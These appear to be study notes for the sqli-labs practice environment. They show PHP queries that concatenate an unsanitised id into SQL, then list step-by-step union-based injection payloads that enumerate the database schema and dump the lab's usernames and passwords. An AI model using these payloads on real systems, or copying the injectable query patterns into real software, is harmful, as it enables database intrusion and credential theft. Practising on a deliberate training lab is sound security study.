sqlilab

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
//  利用 ' 和 后面的 ' 闭合

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
//  and 1=1       and 1=2

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// ')

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
// ")

1.  ?id=1")--+
2.  ?id=1") order by 1--+
3.  ?id=-1") union select 1,2,3--+
4.  ?id=-1") union select 1,2,database()--+ //库名为security
5.  ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+  //表名 emails,referers,uagents,users
6.  ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' and table_schema='security'--+ //字段名 id,email_id
7.  ?id=-1") union select 1,2,group_concat(id) from users--+    //1,2,3,4,5,6,7,8,9,10,11,12,14
8.  ?id=-1") union select 1,2,group_concat(id,0x7e,password) from users--+  //1~Dumb,2~I-kill-you,3~p@ssword,4~crappy,5~stupidity,6~genious,7~mob!le,8~admin,9~admin1,10~admin2,11~admin3,12~dumbo,14~admin4